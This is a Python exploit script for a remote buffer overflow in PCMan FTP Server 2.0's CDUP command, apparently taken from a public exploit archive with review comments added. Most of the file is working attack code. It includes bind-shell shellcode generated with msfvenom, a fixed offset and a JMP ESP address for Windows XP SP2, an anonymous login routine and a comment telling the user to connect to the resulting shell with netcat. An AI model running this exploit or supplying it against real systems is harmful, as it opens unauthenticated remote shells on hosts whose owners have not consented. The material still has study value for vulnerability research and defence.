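#!/usr/bin/python
# PCMan FTP Server 2.0 - 'CDUP' Remote Buffer Overflow
# Date: 23/03/2019
# Affected Software: PCMan 2.0
# Tested on Microsoft Windows XP Professional Version 2002 SP2
# Author: Sachin Wagh
# Twitter: @tiger_tigerboy
#
# Usage: python <this_script> <target_ip> <port>
#
# NOTE(review): run this only against systems you are explicitly authorised
# to test. A successful run crashes the FTP service and leaves an
# unauthenticated bind shell listening on the target.
from __future__ import print_function

import socket
import sys

# Payload generated with:
#   msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
# The -b list excludes CR/LF (they would terminate the FTP command line on
# the wire) and NUL (presumably a string terminator in the server's parser);
# regenerate with the same -b list if you replace the payload.
# Connect afterwards with: nc <target_ip> 1144
# NOTE(review): the original note said "nc target_ip 4444", which does not
# match LPORT=1144 in the msfvenom command -- use whichever port the payload
# was actually generated with.
SHELLCODE = (
    b"\xbb\xb6\x9b\xb7\xa8\xda\xdf\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
    b"\x53\x83\xea\xfc\x31\x5a\x0e\x03\xec\x95\x55\x5d\xec\x42\x1b"
    b"\x9e\x0c\x93\x7c\x16\xe9\xa2\xbc\x4c\x7a\x94\x0c\x06\x2e\x19"
    b"\xe6\x4a\xda\xaa\x8a\x42\xed\x1b\x20\xb5\xc0\x9c\x19\x85\x43"
    b"\x1f\x60\xda\xa3\x1e\xab\x2f\xa2\x67\xd6\xc2\xf6\x30\x9c\x71"
    b"\xe6\x35\xe8\x49\x8d\x06\xfc\xc9\x72\xde\xff\xf8\x25\x54\xa6"
    b"\xda\xc4\xb9\xd2\x52\xde\xde\xdf\x2d\x55\x14\xab\xaf\xbf\x64"
    b"\x54\x03\xfe\x48\xa7\x5d\xc7\x6f\x58\x28\x31\x8c\xe5\x2b\x86"
    b"\xee\x31\xb9\x1c\x48\xb1\x19\xf8\x68\x16\xff\x8b\x67\xd3\x8b"
    b"\xd3\x6b\xe2\x58\x68\x97\x6f\x5f\xbe\x11\x2b\x44\x1a\x79\xef"
    b"\xe5\x3b\x27\x5e\x19\x5b\x88\x3f\xbf\x10\x25\x2b\xb2\x7b\x22"
    b"\x98\xff\x83\xb2\xb6\x88\xf0\x80\x19\x23\x9e\xa8\xd2\xed\x59"
    b"\xce\xc8\x4a\xf5\x31\xf3\xaa\xdc\xf5\xa7\xfa\x76\xdf\xc7\x90"
    b"\x86\xe0\x1d\x0c\x8e\x47\xce\x33\x73\x37\xbe\xf3\xdb\xd0\xd4"
    b"\xfb\x04\xc0\xd6\xd1\x2d\x69\x2b\xda\x40\x36\xa2\x3c\x08\xd6"
    b"\xe2\x97\xa4\x14\xd1\x2f\x53\x66\x33\x18\xf3\x2f\x55\x9f\xfc"
    b"\xaf\x73\xb7\x6a\x24\x90\x03\x8b\x3b\xbd\x23\xdc\xac\x4b\xa2"
    b"\xaf\x4d\x4b\xef\x47\xed\xde\x74\x97\x78\xc3\x22\xc0\x2d\x35"
    b"\x3b\x84\xc3\x6c\x95\xba\x19\xe8\xde\x7e\xc6\xc9\xe1\x7f\x8b"
    b"\x76\xc6\x6f\x55\x76\x42\xdb\x09\x21\x1c\xb5\xef\x9b\xee\x6f"
    b"\xa6\x70\xb9\xe7\x3f\xbb\x7a\x71\x40\x96\x0c\x9d\xf1\x4f\x49"
    b"\xa2\x3e\x18\x5d\xdb\x22\xb8\xa2\x36\xe7\xc8\xe8\x1a\x4e\x41"
    b"\xb5\xcf\xd2\x0c\x46\x3a\x10\x29\xc5\xce\xe9\xce\xd5\xbb\xec"
)

# Number of filler bytes before the saved return address is overwritten.
OFFSET = 2006

# JMP ESP inside SHLWAPI.dll on the tested XP SP2 build (0x77fab127, written
# little-endian). Module load addresses differ between Windows builds and
# service packs, so this value must be re-located for any other target.
JMP_ESP = b"\x27\xb1\xfa\x77"

# Short NOP sled so a slightly-off ESP still lands inside the shellcode.
NOP_SLED = b"\x90" * 20


def build_payload(shellcode=SHELLCODE, offset=OFFSET, ret=JMP_ESP, sled=NOP_SLED):
    """Return the CDUP argument: filler, return address, NOP sled, shellcode.

    Args:
        shellcode: raw payload bytes; must not contain the bad chars the
            payload was generated without (CR, LF, NUL).
        offset: number of filler bytes before the saved return address.
        ret: 4-byte little-endian address that ends up in EIP.
        sled: bytes placed between the return address and the shellcode.

    Returns:
        bytes, ready to be appended to b"CDUP ".
    """
    return b"A" * offset + ret + sled + shellcode


def exploit(target, port, timeout=10):
    """Log in anonymously and send the oversized CDUP argument.

    Args:
        target: IP address or hostname of the PCMan FTP server.
        port: TCP port the FTP service listens on.
        timeout: socket timeout in seconds, so a server that dies after the
            overflow does not leave this script blocked in recv() forever.

    Returns:
        None. The success message is printed only after the CDUP line has
        actually been sent; a socket error on the final recv() is expected
        (the service crashes or starts the bind shell) and is swallowed.
    """
    payload = build_payload()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((target, port))
        sock.recv(1024)  # server banner
        sock.sendall(b"USER anonymous\r\n")
        sock.recv(1024)
        sock.sendall(b"PASS anonymous\r\n")
        sock.recv(1024)
        # The vulnerable command: CDUP with an over-long argument.
        sock.sendall(b"CDUP " + payload + b"\r\n")
        print("[+] Payload Sent Successfully")
        try:
            sock.recv(1024)
        except socket.error:
            # Expected once the overflow fires: the server no longer answers.
            pass
    finally:
        sock.close()


def main(argv=None):
    """Parse <target_ip> <port> from the command line and run the exploit."""
    argv = sys.argv[1:] if argv is None else argv
    print("\n===============================\n")
    print(" PCMan FTP Server 2.0 - 'CDUP' Remote Buffer Overflow \n ")
    print(" Date: 23/03/2019 \n ")
    print(" Affected Software: PCMan 2.0 \n ")
    print(" Tested on Mincrsoft Windows XP Professional Version 2002 SP2 \n ")
    print(" Author: Sachin Wagh \n ")
    print(" Twitter: @tiger_tigerboy \n ")
    print("=================================\n")
    if len(argv) != 2:
        print("Usage: %s <target_ip> <port>" % sys.argv[0])
        sys.exit(1)
    target = argv[0]
    try:
        port = int(argv[1])
    except ValueError:
        print("[-] port must be an integer, got %r" % argv[1])
        sys.exit(1)
    exploit(target, port)


if __name__ == "__main__":
    main()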